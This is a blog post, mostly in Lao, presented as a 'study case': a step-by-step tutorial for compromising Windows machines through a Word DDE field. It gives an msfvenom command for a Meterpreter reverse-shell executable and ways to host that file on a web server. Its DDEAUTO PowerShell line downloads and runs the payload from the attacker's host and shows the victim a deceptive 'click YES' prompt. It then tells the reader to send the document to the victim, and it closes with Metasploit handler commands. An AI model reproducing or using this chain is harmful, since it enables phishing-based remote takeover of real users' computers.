+++
title = "Windows_hacking DDE"
date = 2019-04-08T11:11:07+07:00
categories = ["Window hacking"]
tags = ["security"]
+++
<div style="text-align:center"><h1>Windows reverse shell using DDE (Study case)</h1></div>
<div style="text-align:center">
<img src="./../../images/2600lao.jpg" style="height: auto" width="800" height="400"/>
</div>

## I. **generate reverse shell as .exe file**

> In Kali linux

1. generate shell with msfvenom

    ສ້າງ file ພ້ອມກັບ copy code ລຸ່ມນີ້ໄປໃສ່ `$ touch gen.sh`
    ```sh
    #!/bin/sh
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 -f exe -o $3 
    ```
    > ອະທິບາຍ code
    <style>
        body {
            font-family: saysettha_mx;
        }
        th, td {
            border: 1px solid black;
            border-collapse: collapse;
            text-align:center;
        }
        table {
            width: 100%;
        }
    </style>
    <div style="border: black 1px solid">
        <table>
        <tr>
            <th>words</th>
            <th>Meaning</th>
        </tr>
        <tr>
            <td>$1</td>
            <td>ໃສ່ Listening IP address (ເຄື່ອງ Hacker ຖ້າຮັບ shell)</td>
        </tr>
        <tr>
            <td>$2</td>
            <td>ໃສ່ Listening Port number (ເຄື່ອງ Hacker ຖ້າຮັບ shell)</td>
        </tr>
        <tr>
            <td>$3</td>
            <td>ຊື່ໄຟລ໌</td>
        </tr>
        </table>
    </div>

    >Run code ດ້ວຍຄຳສັ່ງ

    `$ chmod a+x gen.sh` ເຮັດໃຫ້ໄຟລ໌ gen.sh ສາມາດ execute ໄດ້

    `$ ./gen.sh [Listening ip] [Listening port] [outfput filename]`


## II. **ຈຳລອງ web service ຂຶ້ນມາເພື່ອໄວ້ໃຫ້ເຫຍື່ອສາມາດດາວໂຫຼດໄຟລ໌ reverse shell ຈາກເຮົາໄປໃຊ້**

1. ຈຳລອງດ້ວຍ Python simpleHTTPServer 
   - command ສຳລັບຈຳລອງ web service ດ້ວຍ python 
   ```sh
   python2 -m SimpleHTTPServer 80
   ```
   **ອະທິບາຍ**: python ຈະຈຳລອງ present working directory (pwd) ຂຶ້ນເປັນເວັບດ້ວຍ simpleHTTP ທີ່ port 80

2. ຈຳລອງດ້ວຍ PHP
   - command ສຳລັບຈຳລອງ web service ດ້ວຍ phh (ສຳລັບເຄື່ອງທີ່ຕິດຕັ້ງໄວ້ແລ້ວເທົ່ານັ້ນ)
   ```sh
   php -S [ip]:[port]
   ```
3. ຍ້າຍໄປໄວ້ wwwroot ຂອງ apache2
   - ຍ້າຍໄຟລ໌reverse shell ທີ່ໄດ້ມາໄປໄວ້ເທິງ wwwroot directory ເຊິ່ງຈະຢູ່ທີ່ `/var/www/html` ໂດຍ default
   - ຄຳສັ່ງສຳລັບຍ້າຍ `mv [file] /var/www/html`

   - ຫຼັງຈາກນັ້ນ start apache2 service
    ```sh
    service apache2 start
    ```

   - apache2 ຈະຖືກ start ແລະ ສາມາດເຂົ້າໄດ້ຜ່ານ `http://[ip]/filename` ເຂິ່ງ default port ຂອງ web service - apache2 ຈະແມ່ນ 80 ຫຼື 443 ຢູ່ແລ້ວ ຫຼື ຖ້າມີ ssl ກໍ `https://[ip]/filename` ໄປເລີຍ

   - ລອງເຂົ້າເບິ່ງຜ່ານ web browser (firefox, google chrome, edge, safari, internetexplorer ແລະ ອື່ນໆ) ດ້ວຍ `http://[ip]:[port]/[filename]`
   

## III. **ຝັງ DDE code ລົງໃນ file word ແລ້ວສົ່ງໄປໃຫ້ເຫຍື່ອ**
1. ວິທີຝັງແມ່ນໃຫ້ເປີດ microsoft word (ໃນທີ່ນີ້ version 2007) ແລ້ວໄປທີ່ `Insert/Quick parts` ແລ້ວເລືອກ `Field` ຕາມດ້ວຍ `= (Formula)`
2. Click ຂວາທີ່ field ທີ່ອອກມາໃນ word ແລ້ວເລືອກ `Toggle field codes`
3. ລຶບຄຳທີ່ຢູ່ລະຫວ່າງ `{}` ອອກໃຫ້ໝົດ ແລ້ວແທນດ້ວຍ
   
   ```ps1
   DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('http://Hacker_site:port/shellfilename.exe','test.exe'); start 'test.exe' # " "for security reasons click YES"
   ```
4. ແກ້ໄຂ Hacker site ໃສ່ IP ຫຼື Domain ຂອງ web server ທີ່ເປີດໄວ້
5. save file word ແລ້ວສົ່ງຫາເຫຍື່ອ


## IV. Start metasploit framework
1. start msfconsole <br>
   `$ msfconsole`
2. set exploit <br>
   `msf5 > use exploit/multi/handler`
3. set payload <br>
   `msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp`
4. set lhost <br>
   `msf5 exploit(multi/handler) > set lhost [l_ip]`
5. set lport <br>
   `msf5 exploit(multi/handler) > set lport [l_port]`
6. run <br>
   `msf5 exploit(multi/handler) > run -j`
7. show running jobs <br>
   `msf5 exploit(multi/handler) > jobs`
8. show options <br>
   `msf5 exploit(multi/handler) > show options`
9. show sessions <br>
    `msf5 exploit(multi/handler) > sessions -i`
10. select sessions <br>
    `msf5 exploit(multi/handler) > sessions [id]`


